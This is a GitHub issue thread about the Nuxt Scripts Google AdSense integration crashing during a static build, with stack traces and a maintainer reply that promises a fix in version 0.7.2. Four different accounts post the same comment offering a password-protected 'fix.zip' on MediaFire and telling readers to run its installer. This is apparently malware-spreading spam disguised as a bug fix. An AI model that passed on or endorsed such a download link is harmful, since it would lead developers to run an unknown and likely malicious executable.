### ISSUE TITLE
adsense script registry crash when static build

### ISSUE THREAD

**Issue by andronasef** [nuxt/scripts#223]
### 🐛 The bug

when generating static build using https://scripts.nuxt.com/scripts/ads/google-adsense
it gives me error

```
 ERROR  [nuxt] [request error] [unhandled] [500] Cannot read properties of undefined (reading 'expects')            15:17:58  
  at optional (/P:/Work/Dev/Projects/annatools/node_modules/valibot/dist/index.js:3822:25)
  at /P:/Work/Dev/Projects/annatools/.nuxt/prerender/chunks/build/server.mjs:1646:11
  at ModuleJob.run (node:internal/modules/esm/module_job:222:25)
  at async ModuleLoader.import (node:internal/modules/esm/loader:316:24)
  at async /P:/Work/Dev/Projects/annatools/.nuxt/prerender/chunks/_/renderer.mjs:142:24
  at async /P:/Work/Dev/Projects/annatools/.nuxt/prerender/chunks/_/renderer.mjs:253:64
  at async Object.handler (/P:/Work/Dev/Projects/annatools/.nuxt/prerender/chunks/_/renderer.mjs:20:22)
  at async Object.handler (/P:/Work/Dev/Projects/annatools/node_modules/h3/dist/index.mjs:1975:19)
  at async toNodeHandle (/P:/Work/Dev/Projects/annatools/node_modules/h3/dist/index.mjs:2266:7)
  at async ufetch (/P:/Work/Dev/Projects/annatools/node_modules/unenv/runtime/fetch/index.mjs:9:17)


 ERROR  [nuxt] [request error] [unhandled] [500] Cannot read properties of undefined (reading 'expects')            15:17:58  
  at optional (/P:/Work/Dev/Projects/annatools/node_modules/valibot/dist/index.js:3822:25)
  at /P:/Work/Dev/Projects/annatools/.nuxt/prerender/chunks/build/server.mjs:1646:11
  at ModuleJob.run (node:internal/modules/esm/module_job:222:25)
  at async ModuleLoader.import (node:internal/modules/esm/loader:316:24)
  at async /P:/Work/Dev/Projects/annatools/.nuxt/prerender/chunks/_/renderer.mjs:142:24
  at async /P:/Work/Dev/Projects/annatools/.nuxt/prerender/chunks/_/renderer.mjs:253:64
  at async Object.handler (/P:/Work/Dev/Projects/annatools/.nuxt/prerender/chunks/_/renderer.mjs:20:22)
  at async Object.handler (/P:/Work/Dev/Projects/annatools/node_modules/h3/dist/index.mjs:1975:19)
  at async toNodeHandle (/P:/Work/Dev/Projects/annatools/node_modules/h3/dist/index.mjs:2266:7)
  at async ufetch (/P:/Work/Dev/Projects/annatools/node_modules/unenv/runtime/fetch/index.mjs:9:17)

  ├─ / (128ms)                                                                                                nitro 15:17:58
  │ └── Error: [500] 
  ├─ /404.html (128ms)                                                                                        nitro 15:17:58  
  ├─ /200.html (131ms)                                                                                        nitro 15:17:58  

[nitro 15:17:58]  ERROR  RollupError: Entry module "node_modules/.pnpm/nitropack@2.9.6_@opentelemetry+api@1.9.0_encoding@0.1.13_magicast@0.3.4/node_modules/nitropack/dist/runtime/entries/nitro-prerenderer" cannot be external.


undefined


[15:17:58]  ERROR  Entry module "node_modules/.pnpm/nitropack@2.9.6_@opentelemetry+api@1.9.0_encoding@0.1.13_magicast@0.3.4/node_modules/nitropack/dist/runtime/entries/nitro-prerenderer" cannot be external.

  at getRollupError (/P:/Work/Dev/Projects/annatools/node_modules/rollup/dist/es/shared/parseAst.js:392:41)
  at error (/P:/Work/Dev/Projects/annatools/node_modules/rollup/dist/es/shared/parseAst.js:388:42)
  at ModuleLoader.loadEntryModule (/P:/Work/Dev/Projects/annatools/node_modules/rollup/dist/es/shared/node-entry.js:19240:20) 
  at async Promise.all (index 0)



[15:17:58]  ERROR  Entry module "node_modules/.pnpm/nitropack@2.9.6_@opentelemetry+api@1.9.0_encoding@0.1.13_magicast@0.3.4/node_modules/nitropack/dist/runtime/entries/nitro-prerenderer" cannot be external.

error: script "generate" exited with code 1

```

### 🛠️ To reproduce

https://stackblitz.com/edit/nuxt-starter-qd8qem?file=nuxt.config.ts

### 🌈 Expected behavior

works as it should and there is another problem that docs doesn't show me how to me which the client id should be (it's format)

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by harlan-zw** [comment]
Thanks for the issue and reproduction details. 

This will be fixed in 0.7.2 which will be released shortly.
